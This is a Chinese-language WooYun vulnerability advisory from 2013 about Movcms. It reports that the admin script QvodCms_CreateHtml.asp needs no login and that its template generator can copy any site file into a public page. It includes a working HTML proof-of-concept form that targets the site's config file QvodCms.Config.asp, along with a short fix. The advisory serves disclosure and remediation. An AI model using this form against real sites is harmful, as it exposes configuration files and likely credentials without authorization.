当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019312

漏洞标题:Movcms不登陆查看文件源码

相关厂商:Movcms

漏洞作者: 法海

提交时间:2013-02-28 14:26

修复时间:2013-02-28 14:26

公开时间:2013-02-28 14:26

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-02-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Movcms不登陆查看文件源码

详细说明:

后台的 QvodCms_CreateHtml.asp 不需要登陆即可访问
利用其中的 “生成自定义模板” 可以生成一个任意文件,文件内容,可以指向 网站的任何一个文件

漏洞证明:

<form method="post" action="http://域名/后台/QvodCms_CreateHtml.asp?action=other" target="msg1793">
<input name="jstype" type="hidden" value="Define">
<input name="jsname" type="hidden" value="Define">
自定义模板保存路径:<input name="cpath" type="text" value="../wdtasdf.html" style="color:#FF0000">
<select name="Define" onChange="cpath.value='../'+this.options[this.selectedIndex].value;">
<option value="../../../Cache/QvodCms.Config.asp" selected="selected">Config</option>
</select> <input type='submit' value='生成自定义模板'>
</form>
<iframe style="z-index:1;visibility:inherit;width:100%;height:100px;" name="msg1793" frameborder="0" scrolling="yes"></iframe>

修复方案:

在文件中加入权限检测代码

<!--#include file="QvodCms_Check.asp"-->

版权声明:转载请注明来源 法海@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝